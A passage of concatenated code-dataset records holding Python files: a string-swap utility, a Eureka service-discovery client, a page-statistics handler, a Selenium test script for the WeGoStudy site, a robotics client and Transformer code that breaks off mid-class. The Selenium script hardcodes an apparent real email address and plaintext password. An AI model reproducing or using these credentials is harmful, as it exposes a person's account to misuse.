match\n    or where at least one matches\n    or where none match\n    and deterministically-randomly selects from those.\n    \n    produces a cumulative description of changes made 'error_description' (string)\n    and appends to a cumulative log file-document: file-path->log_name\n    \"\"\"\n\n    print_and_log(f\"start apply_swap({input_string}, log_name, {item_1}, {item_2})\", log_name)\n\n    if item_1 not in input_string:\n        print_and_log(f\"no match: {item_1} -> {input_string} \", log_name)\n        return input_string, error_description\n\n    # step 1: input original string and potentially two items to change in it\n    original_equation = input_string\n\n    # Step 2: Split string on \"=\"\n    list_of_splits = input_string.split(\"=\")\n\n    print_and_log(f\"Initial list_of_splits: {list_of_splits}\", log_name)\n\n    # Step 3: Randomly pick one split using string_get_seed_from_sha256_hash() for random seed\n    \"\"\"\n    have the input to the seed include more than just the equation,\n    or every change may similarly be made to the same segment\n    \"\"\"\n    input_to_seed = input_string + item_1 + item_2\n    seed = string_get_seed_from_sha256_hash(input_to_seed, log_name)\n    random.seed(seed)\n    # log\n    print_and_log(seed, log_name)\n\n    # pick a random item-index in list WHERE the item is found.\n    \"\"\"\n    Return a list of indices from `list_of_splits` where the string contains \n    ideally both `item_1` and `item_2`, if not that\n    item_1\n    \"\"\"\n    filtered_indices = [index for index, s in enumerate(list_of_splits) if item_1 in s and item_2 in s]\n    if not filtered_indices:\n        filtered_indices = [index for index, s in enumerate(list_of_splits) if item_1 in s]\n\n    # check length:\n    if not filtered_indices:\n        print_and_log(f\"no match: {input_string} {item_1}\", log_name)\n        return input_string, error_description\n\n    # select randomly from optional indices where fine items are found\n    chosen_split_index = random.choice(filtered_indices)\n\n    # log\n    print_and_log(f\"chosen_split_index: {chosen_split_index}\", log_name)\n\n    # Step 4: Make a change in only that one split picked\n    selected_segment = list_of_splits[chosen_split_index]\n    # apply\n    modified_split = swap_two(selected_segment, item_1, item_2)\n    # log\n    print_and_log(f\"modified_split: {modified_split}\", 
log_name)\n\n    # Replace the chosen split with the modified one\n    list_of_splits[chosen_split_index] = modified_split\n\n    # Step 5: Re-combine list_of_splits\n    result_string = \"=\".join(list_of_splits)\n\n\n    ###################\n    # Log Changes Made\n    ###################\n\n    if item_1 in original_equation:\n        message = f\"Changed {item_1} to {item_2}\"\n        print_and_log(message, log_name)\n        error_description += message + \"; \"\n\n    if item_2 in original_equation:\n        message = f\"Changed {item_2} to {item_1}\"\n        print_and_log(message, log_name)\n        error_description += message + \"; \"\n\n    # log\n    print_and_log(f\"Final string: {result_string}\", log_name)\n\n    message = f\"\"\"\n    Final equation comparison:\n    old -> {original_equation}\n    new -> {result_string}\n    \"\"\"\n    print_and_log(message, log_name)\n\n    # Step 6: Return string\n    return result_string, error_description\n\n\n##############\n# example run\n##############\nlog_name = \"log.txt\"\nerror_description = \"So far...\"\n# apply_swap(input_string, log_name, error_description, item_1, item_2)\nresult = apply_swap(\"applebanana=cherrybanana=cherrybanana\", log_name, error_description, \"a\", \"b\")\n\nprint(f\"Result: {result}\")\n","repo_name":"lineality/simple_swap_python","sub_path":"apply_simple_swap.py","file_name":"apply_simple_swap.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41476825745","text":"\"\"\"\n    Eureka Client\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport random\nimport time\nfrom threading import Thread\n\ntry:\n    from urllib.parse import urljoin\nexcept ImportError:\n    from urlparse import urljoin\n\nimport dns.resolver\n\nfrom .ec2metadata import get_metadata\nfrom .httpclient import HttpClientObject, ApiException\nfrom .hostinfo import HostInfo\n\nlogger = logging.getLogger('service.eureka')\n\nclass EurekaClientException(Exception):\n    pass\n\n\nclass EurekaRegistrationFailedException(EurekaClientException):\n    pass\n\n\nclass EurekaUpdateFailedException(EurekaClientException):\n    pass\n\n\nclass EurekaHeartbeatFailedException(EurekaClientException):\n    pass\n\n\nclass EurekaGetFailedException(EurekaClientException):\n    pass\n\n\nclass EurekaClient(object):\n    \"\"\"\n    Eureka Client\n    \"\"\"\n    EUREKA_SERVICE_URL = 'EUREKA_SERVICE_URL'\n    EUREKA_INSTANCE_DATACENTER = 'EUREKA_INSTANCE_DATACENTER'\n    EUREKA_HEARTBEAT_INTERVAL = 'EUREKA_HEARTBEAT_INTERVAL'\n    EUREKA_SERVICE_PATH = 'EUREKA_SERVICE_PATH'\n    EUREKA_INSTANCE_HOSTNAME = 'EUREKA_INSTANCE_HOSTNAME'\n    EUREKA_INSTANCE_PORT = 'EUREKA_INSTANCE_PORT'\n    EUREKA_INSTANCE_SECURE_PORT = 'EUREKA_INSTANCE_SECURE_PORT'\n\n    def __init__(self,\n                 name,\n                 eureka_url=None,\n                 eureka_domain_name=None,\n                 host_name=None,\n                 data_center=None,\n                 instance_id=None,\n                 vip_address=None,\n                 secure_vip_address=None,\n                 port=None,\n                 secure_port=None,\n                 use_dns=True,\n                 region=None,\n                 prefer_same_zone=True,\n                 context=\"eureka/v2\",\n                 eureka_port=None,\n                 https_enabled=False,\n                 heartbeat_interval=None,\n                 service_path=None,\n                 pool_manager=None):\n\n        self.app_name = name\n\n        self.eureka_url = eureka_url or os.environ.get(EurekaClient.EUREKA_SERVICE_URL, None)\n        self.data_center = data_center or os.environ.get(EurekaClient.EUREKA_INSTANCE_DATACENTER, None)\n        self.heartbeat_interval = heartbeat_interval or int(os.environ.get(EurekaClient.EUREKA_HEARTBEAT_INTERVAL, 30))\n        self.service_path = service_path or os.environ.get(EurekaClient.EUREKA_SERVICE_PATH, 'eureka/apps')\n        self.host_name = host_name 
or os.environ.get(EurekaClient.EUREKA_INSTANCE_HOSTNAME, None)\n        self.port = port or os.environ.get(EurekaClient.EUREKA_INSTANCE_PORT, None)\n        self.secure_port = secure_port or os.environ.get(EurekaClient.EUREKA_INSTANCE_SECURE_PORT, None)\n        self.use_dns = use_dns\n        self.region = region\n        self.prefer_same_zone = prefer_same_zone\n        self.eureka_domain_name = eureka_domain_name\n        self.eureka_port = eureka_port\n        self.heartbeat_task = None\n        self.instance_id = instance_id\n        self.app_protocol = 'https://' if https_enabled else 'http://'\n\n        host_info = HostInfo().get()\n\n        if data_center == \"Amazon\":\n            self.host_name = get_metadata(\"hostname\")\n        elif not host_name:\n            self.host_name = host_info['host']\n\n        self.vip_address = vip_address\n        if not self.vip_address:\n            self.vip_address = host_info['IPv4']\n\n        self.secure_vip_address = secure_vip_address\n        if not self.secure_vip_address:\n            self.secure_vip_address = host_info['IPv4']\n\n        # Relative URL to eureka\n        self.context = context\n        self.eureka_urls = self.get_eureka_urls()\n        self.requests = HttpClientObject(pool_manager=pool_manager)\n\n    def _get_txt_records_from_dns(self, domain):\n        records = dns.resolver.query(domain, 'TXT')\n        for record in records:\n            for string in record.strings:\n                yield string\n\n    def _get_zone_urls_from_dns(self, domain):\n        for zone in self._get_txt_records_from_dns(domain):\n            yield zone\n\n    def get_zones_from_dns(self):\n        return {\n            zone_url.split(\".\")[0]:\n                list(self._get_zone_urls_from_dns(\"txt.%s\" % zone_url))\n            for zone_url in list(self._get_zone_urls_from_dns('txt.%s.%s' % (self.region, self.eureka_domain_name)))\n        }\n\n    def get_eureka_urls(self):\n        \"\"\"\n        Get Eureka URLs\n        \"\"\"\n        if self.eureka_url:\n            return [self.eureka_url]\n        elif self.use_dns:\n            zone_dns_map = self.get_zones_from_dns()\n            # materialize the keys so pop()/index() below work under Python 3\n            zones = list(zone_dns_map.keys())\n            assert len(zones) > 0, \"No availability zones found, please add them explicitly\"\n            if self.prefer_same_zone:\n                if self.get_instance_zone() in zones:\n                    zones = [zones.pop(\n                        zones.index(self.get_instance_zone()))] + zones  # Add our zone as the first element\n                else:\n                    logger.warn(\"No match for the zone %s in the list of available zones %s\" % (\n                        self.get_instance_zone(), zones)\n                    )\n            service_urls = []\n            for zone in zones:\n                eureka_instances = zone_dns_map[zone]\n                random.shuffle(eureka_instances)  # Shuffle order for load balancing\n                for eureka_instance in eureka_instances:\n                    server_uri = \"http://%s\" % eureka_instance\n                    if self.eureka_port:\n                        server_uri += \":%s\" % self.eureka_port\n                    eureka_instance_url = urljoin(server_uri, self.context, \"/\")\n                    if not eureka_instance_url.endswith(\"/\"):\n                        eureka_instance_url = \"%s/\" % eureka_instance_url\n                    service_urls.append(eureka_instance_url)\n            primary_server = service_urls.pop(0)\n            random.shuffle(service_urls)\n            service_urls.insert(0, primary_server)\n            logger.info(\"This client will talk to the following serviceUrls in order: %s\" % service_urls)\n            return service_urls\n\n    def get_instance_zone(self):\n        \"\"\"\n        Get Instance Zone\n        \"\"\"\n        if self.data_center == \"Amazon\":\n            return get_metadata('availability-zone')\n        else:\n            raise NotImplementedError(\"%s does not implement DNS lookups\" % self.data_center)\n\n    def get_instance_id(self):\n        \"\"\"\n        Get Instance ID\n        \"\"\"\n        if self.instance_id:\n            return self.instance_id\n        return self.host_name + ':' + self.app_name + ':' + str(self.port)\n\n    def get_instance_data(self):\n        \"\"\"\n        Get Instance Data\n        \"\"\"\n        data_center_info = {\n            'name': self.data_center\n        }\n        if self.data_center == 
\"Amazon\":\n data_center_info['metadata'] = {\n 'ami-launch-index': get_metadata('ami-launch-index'),\n 'local-hostname': get_metadata('local-hostname'),\n 'availability-zone': get_metadata('availability-zone'),\n 'instance-id': get_metadata('instance-id'),\n 'public-ipv4': get_metadata('local-ipv4'),\n 'public-hostname': get_metadata('hostname'),\n 'ami-manifest-path': get_metadata('ami-manifest-path'),\n 'local-ipv4': get_metadata('local-ipv4'),\n 'ami-id': get_metadata('ami-id'),\n 'instance-type': get_metadata('instance-type'),\n }\n return {\n 'instance': {\n 'app': self.app_name,\n 'instanceId': self.get_instance_id(),\n 'hostName': self.host_name,\n 'ipAddr': self.vip_address,\n 'healthCheckUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'statusPageUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'homePageUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'port': {\n '$': self.port,\n '@enabled': 'true' if self.port is not None else 'false',\n },\n 'securePort': {\n '$': self.secure_port,\n '@enabled': 'true' if self.secure_port is not None else 'false',\n },\n 'vipAddress': self.vip_address,\n 'dataCenterInfo': {\n '@class': 'com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo',\n 'name': 'MyOwn',\n },\n },\n }\n\n def star(self):\n \"\"\"\n Start registration process\n :return:\n \"\"\"\n logger.info('Starting eureka registration')\n self.register()\n self.heartbeat_task = Thread(target=self._heartbeat)\n self.heartbeat_task.daemon = True\n self.heartbeat_task.start()\n\n def _heartbeat(self):\n while True:\n try:\n time.sleep(self.heartbeat_interval)\n self.renew()\n except Exception as ex:\n logger.debug(\"Exception during heartbeat: %s\" % eureka_url, str(ex))\n\n def register(self, initial_status=\"UP\"):\n \"\"\"\n Registers instance with Eureka, begins heartbeats, and fetches registry.\n :param initial_status: status string\n :return:\n \"\"\"\n instance_data = self.get_instance_data()\n instance_data['instance']['status'] = initial_status\n\n success = False\n for eureka_url in self.eureka_urls:\n url = urljoin(eureka_url, self.service_path + \"/%s\" % self.app_name)\n try:\n self.requests.POST(\n url=url, body=instance_data,\n headers={'Content-Type': 'application/json'})\n success = True\n except ApiException as ex:\n logger.debug(\"ApiException while trying to register at '%s' error: %s\" % (url, str(ex)))\n success = False\n if not success:\n raise EurekaRegistrationFailedException(\"Did not receive correct reply from any instances\")\n\n def renew(self):\n \"\"\"\n Send application instance heartbeat\n \"\"\"\n logger.info(' Updating registeration status ')\n success = False\n for eureka_url in self.eureka_urls:\n url = urljoin(eureka_url, self.service_path + '/%s/%s' % (\n self.app_name,\n self.get_instance_id()\n ))\n try:\n self.requests.PUT(url=url)\n success = True\n except ApiException as ex:\n logger.debug(\"ApiException while trying to renew at '%s' error: %s\" % (url, str(ex)))\n if ex.status == 404:\n self.register()\n return\n else:\n success = False\n if not success:\n raise EurekaUpdateFailedException(\"Did not receive correct reply from any instances\")\n\n # a generic get request, since most of the get requests for discovery will take a similar form\n def _get_from_any_instance(self, endpoint):\n for eureka_url in self.eureka_urls:\n try:\n r = self.requests.GET(urljoin(eureka_url, endpoint), headers={'accept': 'application/json'})\n 
r.raise_for_status()\n return json.loads(r.content)\n except:\n pass\n raise EurekaGetFailedException(\"Failed to GET %s from all instances\" % endpoint)\n\n def get_apps(self):\n return self._get_from_any_instance(\"apps\")\n\n def get_app(self, app_id):\n return self._get_from_any_instance(\"apps/%s\" % app_id)\n\n def get_vip(self, vip_address):\n return self._get_from_any_instance(\"vips/%s\" % vip_address)\n\n def get_svip(self, vip_address):\n return self._get_from_any_instance(\"svips/%s\" % vip_address)\n\n def get_instance(self, instance_id):\n return self._get_from_any_instance(\"instances/%s\" % instance_id)\n\n def get_app_instance(self, app_id, instance_id):\n return self._get_from_any_instance(\"apps/%s/%s\" % (app_id, instance_id))\n","repo_name":"elviejokike/flask-eureka","sub_path":"flask_eureka/eurekaclient.py","file_name":"eurekaclient.py","file_ext":"py","file_size_in_byte":12210,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"1150704972","text":"from datetime import datetime, timedelta\nfrom src.json_utils import *\nfrom src.responds import *\nfrom src.user_utils import *\nfrom src.errors import *\nfrom src.file_utils import *\nfrom src.night_mode import *\n\nPROJECT_DIR = Path(__file__).parent.parent.resolve()\nVISIR_COUNTERS = PROJECT_DIR / \"visit_counters.json\"\n\n\ndef increment_page_visit(self, endpoint: str) -> None:\n today = str(datetime.today().date())\n statistics_content = read_json_file(VISIR_COUNTERS)\n\n if endpoint not in statistics_content:\n statistics_content[endpoint] = {}\n if today not in statistics_content[endpoint]:\n statistics_content[endpoint][today] = 0\n\n statistics_content[endpoint][today] += 1\n write_json_file(VISIR_COUNTERS, statistics_content)\n\n\ndef calculate_stats(page_statistics, start_date, count_days) -> int:\n visit_counter = 0\n for day_counter in range(0, count_days + 1):\n day = str(start_date - timedelta(days=day_counter))\n if day in page_statistics:\n visit_counter += page_statistics[day]\n\n return visit_counter\n\n\ndef get_page_statistics(self, method: str, endpoint: str, _qs) -> None:\n switcher = {\n \"GET\": show_page_statistics,\n \"POST\": save_page_statistics,\n }\n if method in switcher:\n switcher[method](self, endpoint, \"/statistics\")\n else:\n raise MethodNotAllowed\n\n\ndef show_page_statistics(self, _method, _endpoint) -> None:\n statistics_content = read_json_file(VISIR_COUNTERS)\n\n today = datetime.today().date()\n stats = {}\n for page in statistics_content:\n stats[page] = {}\n stats[page][\"today\"] = calculate_stats(statistics_content[page], today, 0)\n stats[page][\"yesterday\"] = calculate_stats(statistics_content[page], today - timedelta(days=1), 0)\n stats[page][\"week\"] = calculate_stats(statistics_content[page], today, 7)\n stats[page][\"month\"] = calculate_stats(statistics_content[page], today, 30)\n\n html = \"\"\"
html = \"\"\"\n    <tr>\n        <th>Page</th>\n        <th>Today</th>\n        <th>Yesterday</th>\n        <th>Week</th>\n        <th>Month</th>\n    </tr>\n    \"\"\"\n    for endpoint, visits in stats.items():\n        html += f\"<tr><td>{endpoint}</td>\"\n        for data, count in visits.items():\n            html += f\"<td>{count}</td>\"\n        html += \"</tr>\"\n\n    user_id = get_user_id(self)\n    user_session = read_user_session(self, user_id)\n\n    msg = get_file_contents(\"pages/statistics.html\").format(stats=html, **user_session[user_id])\n    respond_200(self, msg, \"text/html\")\n\n\ndef save_page_statistics(self, endpoint: str, redirect_to: str):\n    switcher = {\n        \"/statistics/set_night_mode\": set_night_mode,\n    }\n    if endpoint in switcher:\n        switcher[endpoint](self, redirect_to)\n    else:\n        raise MethodNotAllowed","repo_name":"jajabin/teachmeskills","sub_path":"src/statistics_page.py","file_name":"statistics_page.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25658377519","text":"import datetime\nfrom time import sleep\nfrom selenium import webdriver\nimport wegostudy_locator as locators\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\ns = Service(executable_path='./chromedriver.exe')\ndriver = webdriver.Chrome(service=s)\n\ndef setUp():\n    # print test start day and time\n    print(f'Test started at: {datetime.datetime.now()}')\n\n    # Make a full screen\n    driver.maximize_window()\n\n    # Let's wait for the browser to respond in general\n    driver.implicitly_wait(30)\n\n    # navigating to the WeGoStudy website\n    driver.get(locators.wegostudy_url)\n\n    # Checking that we're on the correct URL address and we're seeing the correct title\n    if driver.current_url == locators.wegostudy_url and driver.title == \"WeGoStudy\":\n        print(f'we are at the we go study homepage --{driver.current_url}')\n        print(f'we\\'re seeing title message --{driver.title} ')\n        sleep(1)\n\n    else:\n        print(f'we\\'re not at the we go study homepage, check your code!')\n        driver.close()\n        driver.quit()\n\n\ndef tearDown():\n    if driver is not None:\n        print(f'------------------------------------')\n        print(f'Test Completed at: {datetime.datetime.now()}')\n        driver.close()\n        driver.quit()\n\ndef browse_institution():\n    driver.find_element(By.LINK_TEXT, 'BROWSE INSTITUTIONS').click()\n    sleep(0.5)\n    if driver.current_url == locators.browse_institution_url:\n        driver.find_element(By.XPATH, \"//h2[contains(text(),'Search The Largest Database of Institutions In Can')]\").is_displayed()\n        sleep(0.5)\n        print(f'we are on the browse institution page------{driver.current_url}')\n\n        driver.find_element(By.XPATH, \"//input[@id='search_field']\").click()\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//input[@id='search_field']\").send_keys('Niagara College')\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//button[@id='search_institute_form']\").click()\n        sleep(0.5)\n\ndef sign_in():\n    driver.find_element(By.XPATH, \"//b[normalize-space()='LOGIN']\").click()\n    sleep(0.5)\n\n    driver.find_element(By.XPATH, \"//input[@id='user_email']\").send_keys('chris.velasco78@gmail.com')\n    sleep(0.5)\n\n    driver.find_element(By.XPATH, \"//input[@id='user_password']\").send_keys('123cctb')\n    sleep(0.5)\n\n    driver.find_element(By.XPATH, \"//input[@name='commit']\").click()\n    sleep(1)\n\n    # driver.find_element(By.XPATH, \"//div[@id='authentication']\").click()\n    # sleep(0.5)\n\n    if driver.
current_url == locators.partner_home_url:\n driver.find_element(By.XPATH, \"//span[contains(.,'Ch Velasco')]\").is_displayed()\n sleep(0.5)\n print(f'Test scenario: login with new credential : username - chris.velasco78@gmail.com, password - 123cctb')\n\n else:\n print(\"Check your code!\")\n\n\ndef my_wegostudy_applications():\n if driver.current_url == locators.partner_home_url:\n driver.find_element(By.XPATH, \"//span[contains(.,'My WeGoStudy')]\").click()\n sleep(0.5)\n driver.find_element(By.XPATH, \"//a[contains(.,'Applications')]\").click()\n sleep(0.5)\n\n # All Application\n if driver.current_url == locators.mywegostudy_application_url:\n driver.find_element(By.XPATH, \"//h4[contains(.,'Admission Applications')]\").is_displayed()\n sleep(0.5)\n print(f'we are at Application home page -- {driver.current_url}')\n\n else:\n print(' we are not landing at application page, check your code')\n\n driver.find_element(By.XPATH, \"//a[contains(.,'All Applications')]\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'AS000071-35')]\").is_displayed()\n sleep(0.5)\n\n # navigate to Edit admission application by application number.\n driver.find_element(By.XPATH, \"//a[contains(.,'AS000071-35')]\").click()\n sleep(2)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver. current_url == locators.edit_reza_admission_url:\n assert driver.find_element(By.XPATH, \"//h4[contains(.,'Edit admission application for Reza')]\").is_displayed()\n print(f' we are at Edit admission application for Reza page.')\n\n else:\n print('check your code!')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n\n # Id Number\n driver.find_element(By.XPATH, \"//a[contains(.,'S000071')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'S000071')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver.current_url == locators.reza_detail_url:\n driver.find_element(By.XPATH, \"//a[contains(.,'Personal Details:')]\").is_displayed()\n driver.find_element(By.XPATH, \"//a[contains(.,'Reza')]\").is_displayed()\n print(f' we are at student details page.')\n\n else:\n print('check your code')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n\n #First name, Lastname\n driver.find_element(By.XPATH, \"//a[contains(.,'Reza')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'sada')]\").is_displayed()\n sleep(0.5)\n\n # school\n driver.find_element(By.XPATH, \"//a[contains(.,'Algonquin College')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'Algonquin College')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n if driver.current_url == locators.algonquin_college_url:\n print('we are at ALGONQUIN COLLEGE home page ')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n sleep(0.5)\n\n #Programs\n driver.find_element(By.XPATH, \"//a[contains(.,'Forestry Technician')]\").is_displayed()\n sleep(0.5)\n driver.find_element(By.XPATH, \"//a[contains(.,'Forestry Technician')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver.current_url == locators.forestry_technician_url:\n driver.find_element(By.XPATH, 
\"//h4[contains(.,'Forestry Technician')]\").is_displayed()\n            print('we are at Forestry Technician page.')\n            driver.close()\n\n        # switch to original tab\n        driver.switch_to.window(driver.window_handles[0])\n        sleep(0.5)\n\n        # status\n        driver.find_element(By.XPATH, \"//span[@class='badge badge-incomplete status-badge']\").is_displayed()\n        sleep(0.5)\n\n        # status date\n        driver.find_element(By.XPATH, \"//td[contains(.,'April 21, 2022')]\").is_displayed()\n        sleep(0.5)\n\n        # check select\n        driver.find_element(By.XPATH, \"//label[@for='application_ids_84']\").click()\n        sleep(0.5)\n\n        # Chat\n        driver.find_element(By.XPATH, \"//i[@class='fa fa-comments-o']\").click()\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//input[@id='admin_message_content']\").click()\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//input[@id='admin_message_content']\").send_keys(locators.subject)\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//i[@class='fa fa-paper-plane']\").click()\n        sleep(0.5)\n\n        driver.find_element(By.XPATH, \"//i[@class='fa fa-comments-o']\").click()\n        sleep(0.5)\n        print('successfully sent message!')\n\n        driver.find_element(By.XPATH, \"//button[@class='btn btn-default btn-sm']\").click()\n        sleep(0.5)\n\n\n\n    # driver.find_element(By.XPATH, \"//button[@id='pay_for_application']\").click()\n    # sleep(0.5)\n    # if driver.current_url == locators.pay_application_url:\n    #     driver.find_element(By.XPATH,\"//h4[contains(.,'Pay Application fee $ 95')]\").is_displayed()\n    #\n    #\n    # # Incomplete Applications\n    # driver.find_element(By.XPATH, \"//a[contains(.,'Incomplete Applications')]\").click()\n    # if driver.current_url == locators.mywegostudy_incomplete_application_url:\n    #\n    # # Submitted Applications\n    # driver.find_element(By.XPATH,\"//a[contains(.,'Submitted Applications')]\").
click()\n    # if driver.current_url == locators.mywegostudy_submitted_application_url:\n    #\n    # # Approved Applications\n    # driver.find_element(By.XPATH,\"//a[contains(.,'Approved Applications')]\").click()\n    # if driver.current_url == locators.mywegostudy_approved_application_url:\n    #\n    #\n    # # Accepted Applications\n    # driver.find_element(By.XPATH, \"//a[contains(.,'Accepted Applications')]\").click()\n    # if driver.current_url == locators.mywegostudy_accepted_application_url:\n\n\n\nsetUp()\n# browse_institution()\nsign_in()\nmy_wegostudy_applications()\n# tearDown()\n","repo_name":"EileenHwang-QA/Wegostudyapp","sub_path":"wegostudy_methods.py","file_name":"wegostudy_methods.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23797960133","text":"from typing import Optional\nimport pickle\n\nfrom beartype import beartype\nimport torch\n\nfrom edf_interface.pyro import get_service_proxy\nfrom edf_interface.data import SE3, PointCloud, TargetPoseDemo, DemoSequence\n\n@beartype\nclass EdfClient():\n    def __init__(self, env_server_name: str = 'env',\n                 agent_server_name: str = 'agent'):\n        self.env_service = get_service_proxy(env_server_name)\n        self.agent_service = get_service_proxy(agent_server_name)\n\n    def get_current_poses(self, **kwargs) -> SE3:\n        data_dict = self.env_service.get_current_poses(**kwargs)\n        return SE3.from_data_dict(data_dict=data_dict)\n\n    def observe_scene(self, **kwargs) -> PointCloud:\n        data_dict = self.env_service.observe_scene(**kwargs)\n        return PointCloud.from_data_dict(data_dict=data_dict)\n\n    def observe_grasp(self, **kwargs) -> PointCloud:\n        data_dict = self.env_service.observe_grasp(**kwargs)\n        return PointCloud.from_data_dict(data_dict=data_dict)\n\n    def move_se3(self, target_poses: SE3, **kwargs) -> bool:\n        target_poses = target_poses.get_data_dict(serialize=True)\n        success = self.env_service.move_se3(target_poses=target_poses, **kwargs)\n        return success\n\n    def infer_target_poses(self, scene_pcd: PointCloud,\n                           task_name: str,\n                           grasp_pcd: Optional[PointCloud] = None,\n                           current_poses: Optional[SE3] = None,\n                           **kwargs) -> SE3:\n        scene_pcd = scene_pcd.get_data_dict(serialize=True)\n        if grasp_pcd is not None:\n            grasp_pcd = grasp_pcd.get_data_dict(serialize=True)\n        else:\n            grasp_pcd = {}\n        if current_poses is not None:\n            current_poses = current_poses.get_data_dict(serialize=True)\n        else:\n            current_poses = {}\n        target_poses_dict = self.agent_service.infer_target_poses(scene_pcd=scene_pcd, grasp_pcd=grasp_pcd, task_name=task_name, current_poses=current_poses, **kwargs)\n        return SE3.from_data_dict(target_poses_dict)\n","repo_name":"tomato1mule/edf_interface","sub_path":"dev_log/edf_client.py","file_name":"edf_client.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26445251001","text":"import math\nimport torch\nimport torch.nn as nn\n# torch's Variable wrapper\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom copy import deepcopy as c\n\nclass Embedding(nn.Module):\n    def __init__(self, d_model, d_vocab):\n        super().__init__()\n        self.d_model = d_model\n        self.emb = nn.Embedding(d_vocab, d_model)\n\n    def forward(self, x):\n        # math.sqrt(self.d_model) is the scaling factor\n        return self.emb(x) * math.sqrt(self.d_model)\n\n
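# e.g. with the default d_model=512 the embedding output is scaled by sqrt(512) ~= 22.6,\n# keeping the token embeddings on a magnitude comparable to the positional encodings added next\n\n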
class PositionEmbedding(nn.Module):\n    def __init__(self, d_model=512, p_dropout=0.1, max_len=5000):\n        super().__init__()\n        # apply dropout to the summed embeddings\n        self.dropout = nn.Dropout(p=p_dropout)\n\n        # start from an all-zero positional encoding\n        pe = torch.zeros((max_len, d_model))\n        position = torch.arange(0, max_len).unsqueeze(1)  # => (max_len, 1)\n        # sine/cosine positional encoding:\n        # pe(pos, 2i) = sin(pos/10000^(2i/d_model)) = sin(pos * e^(2i * -log(10000.0) / d_model))\n        # pe(pos, 2i + 1) = cos(pos/10000^(2i/d_model)) = cos(pos * e^(2i * -log(10000.0) / d_model))\n        # how to read pos and i: pos is the word's position in the input sequence,\n        # while i indexes the dimension of the word vector\n        # torch.arange(0, d_model, 2) corresponds to 2i\n        div_term = torch.exp(torch.arange(0, d_model, 2) * -(math.log(10000.0) / d_model))\n        pe[:, 0::2] = torch.sin(position * div_term)\n        pe[:, 1::2] = torch.cos(position * div_term)\n\n        # pe is (max_len, d_model) here; add a leading dim because the input is 3-D with a batch_size\n        pe = pe.unsqueeze(0)\n\n        # finally, register pe as a buffer. What is a buffer?\n        # state that helps the model but is neither a hyperparameter nor a trainable parameter,\n        # so the optimizer never updates it; once registered it is saved and reloaded\n        # together with the model's structure and parameters via state_dict()\n        # see: https://blog.csdn.net/weixin_46197934/article/details/119518497\n        self.register_buffer('pe', pe)\n    def forward(self, x):\n        # add pe to the current input of shape [batch, word_len, d_model]\n        # why :x.size(1)? pe was precomputed up to max_len, so we just slice what we need\n        x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n        return self.dropout(x)\n\ndef subsequent_mask(size=512):\n    \"\"\"\n    Build the look-ahead mask tensor; size gives the last two dimensions of the mask,\n    which form a square matrix\n    1 0 0 0\n    1 1 0 0\n    1 1 1 0\n    1 1 1 1\n    intuitively, earlier inputs need no attention to positions that have not been fed in yet\n    \"\"\"\n    # build an all-ones matrix, keep its upper triangle, then subtract it from 1 to get the lower triangle\n    subsequent_mask = np.triu(np.ones((1, size, size)), k = 1).astype(np.int8)\n    return torch.from_numpy(1 - subsequent_mask)\n\ndef attention(query, key, value, mask=None, dropout=None):\n    \"\"\"\n    computes: ans = softmax(Q * K_T / sqrt(d_k)) * V\n    \"\"\"\n    # attention scores\n    d_k = query.size(-1)\n    scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n\n    # apply the mask tensor if one is given\n    if mask is not None:\n        # set positions where mask is 0 to -1e9\n        scores = scores.masked_fill(mask == 0, -1e9)\n\n    # softmax over the last dimension\n    p_attn = F.softmax(scores, dim=-1)\n\n    # optional dropout\n    if dropout is not None:\n        p_attn = dropout(p_attn)\n\n    # return the attended values together with the attention weights\n    return torch.matmul(p_attn, value), p_attn\n\ndef clone_modules(module, N):\n    \"\"\"\n    clone N copies of module\n    \"\"\"\n    return nn.ModuleList([c(module) for _ in range(N)])\n\nclass MultiHeadedAttention(nn.Module):\n    \"\"\"\n    multi-head attention\n    \"\"\"\n    def 